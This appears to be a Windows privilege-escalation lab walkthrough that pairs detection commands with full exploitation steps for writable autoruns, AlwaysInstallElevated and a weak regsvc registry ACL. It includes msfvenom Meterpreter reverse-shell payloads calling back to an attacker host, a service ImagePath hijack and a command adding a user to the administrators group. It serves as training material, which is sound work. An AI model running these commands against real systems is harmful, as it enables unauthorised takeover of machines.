# Escalation Path Registry

## Autorun

Autoruns refer to programs, scripts, or services that automatically execute when Windows starts or when a device (like a USB) is plugged in.

### Detection of Auto runs programs 

***Windows VM***

**Run Autoruns**:

Open *Command Prompt* and execute `Autoruns64.exe`.

```
**C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe**
```

Navigate to the *‘Logon’ tab* to check programs that auto-start at user login.

**Identify Vulnerable Entry**:

"My Program" is set to run automatically from:

```
C:\Program Files\Autorun Program\program.exe
```

**Check File Permissions**:

Use *AccessChk* to inspect permissions:
   
```
accesschk64.exe -wvu "C:\Program Files\Autorun Program"
```

The output shows **"Everyone" has FILE_ALL_ACCESS**, meaning **any user (even non-admins) can modify** `program.exe`.

**Exploitation Possibility**:

- Since `program.exe` runs at *logon*, an attacker can *replace it with a malicious file* (e.g., a reverse shell).

- Upon restart/login, the system will execute the attacker’s payload, potentially leading to **privilege escalation**.

### Exploitations

**Kali VM**

Open command prompt and type: 

```
msfconsole
```

In Metasploit (msf > prompt) type: 

```
use multi/handler
```  

In Metasploit (msf > prompt) type:

```
set payload windows/meterpreter/reverse_tcp
```  

In Metasploit (msf > prompt) type: 

```
set lhost [Kali VM IP Address]
```

In Metasploit (msf > prompt) type: 

```
run
```

Open an additional command prompt and type: 

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe  
```

Copy the generated file, program.exe, to the Windows VM.

**Windows VM**

1. Place program.exe in `C:\Program Files\Autorun Program`  
2. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.

**Kali VM**

1. Wait for a new session to open in Metasploit.  
2. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: `getuid`

## AlwaysInstallElevated

The **AlwaysInstallElevated"** setting in Windows allows **MSI (Microsoft Installer) packages** to install with **SYSTEM privileges**, even when run by a low-privileged user. If misconfigured, an attacker can exploit it to **gain full control (privilege escalation)**.

### Detection 

**Windows VM**

1. Open command prompt and type: 

```
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
```  

From the output, notice that `AlwaysInstallElevated` value is `1`. 

2. In command prompt type: 

```
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
```  

From the output, notice that `AlwaysInstallElevated` value is `1`.

### Exploitation

**Kali VM**

Open command prompt and type: `msfconsole`  

In Metasploit (msf > prompt) type:

```
use multi/handler  
```

In Metasploit (msf > prompt) type: 

```
set payload windows/meterpreter/reverse_tcp  
```

In Metasploit (msf > prompt) type: 

```
set lhost [Kali VM IP Address]  
```

In Metasploit (msf > prompt) type: `run` 

Open an additional command prompt and type:

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi  
```

Copy the generated file, `setup.msi`, to the Windows VM. 

**Windows VM**

1.Place *setup.msi* in `C:\Temp`.  
2.Open command prompt and type: 

```
msiexec /quiet /qn /i C:\Temp\setup.msi
```

## regsrv (registry service)

This attack exploits **weak registry permissions** on the `regsvc` service, allowing a **low-privileged user** to replace the service’s executable path with a **malicious binary**, resulting in **privilege escalation** to an administrator

### Detection

**Windows VM**

Open `powershell` prompt and type:

```
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```

Notice that the output suggests that user belong to `NT AUTHORITY\INTERACTIVE` has `FullContol` permission over the registry key.

### Exploitation

**Windows VM**

Copy `C:\Users\User\Desktop\Tools\Source\windows_service.c` to the Kali VM.

**Kali VM**

Open `windows_service.c` in a text editor and replace the command used by the system() function to: 

```
cmd.exe /k net localgroup administrators user /add
```

Exit the text editor and compile the file by typing the following in the command prompt:

```
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
```

(NOTE: if this is not installed, `use 'sudo apt install gcc-mingw-w64`')

Copy the generated file `x.exe`, to the Windows VM.

**Windows VM**

Place `x.exe` in `C:\Temp`.  

Open command prompt at type:

```
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
```  

In the command prompt type: 

```
sc start regsvc  
```

It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:

```
net localgroup administrators
```



